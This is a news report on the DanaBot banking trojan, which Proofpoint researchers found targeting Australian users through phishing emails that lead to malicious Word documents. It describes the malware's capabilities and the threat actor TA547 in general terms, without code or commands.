A new banking trojan called DanaBot has emerged that is primarily targeting users in Australia. The malware, which is written in Delphi and currently still under development, has only been operated by one threat actor dubbed TA547 so far.
The malware operator is known to have previously bought banking malware from other malware developers and operators. Active since November 2017, TA547 has distributed other malware variants including Ursnif, Gootkit, Atmos, Panda Baker, Corebot, Mazer Bot, as well as the Red Alert Android malware. Countries previously targeted by this threat actor include UK, Germany, Italy and Australia.
There is also evidence suggesting the malware may have been distributed by other threat actors since additional samples of the malware were discovered in malware repositories.
DanaBot is distributed via phishing emails that contain malicious URLs that redirect the targets to a Microsoft Word document hosted on another site. The malicious document, when enabled, downloads the DanaBot malware using a PowerShell command. The document also includes stolen and copied branding that claim to be protected by a security vendor.
The malware also checks the target’s geolocation and is only served up to users in Australia. The malware comes with data-stealing and banking site web injection capabilities. It steals the targeted system’s detailed system information, files stored on the hard disk and a screenshot of the user’s desktop - all of which it sends to the C2 server.
“Currently, the malware is in active development and there appear to be two versions. We observed the first in a campaign around May 6 and 7 while the second appeared around May 29. However, we found even earlier samples via pivots in malware repositories that date from the middle of April but we have not seen these in the wild,” Proofpoint researchers, who discovered DanaBot, said in a blog.
DanaBot currently targets users of several popular email clients, including Outlook and Windows Live Mail. The malware also targets users of instant messengers such as Trillian, Digsby and Miranda.
“After nearly two years of relentless, high-volume ransomware campaigns, threat actors appear to be favoring less noisy malware such as banking Trojans and information stealers,” Proofpoint researchers said. “The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.”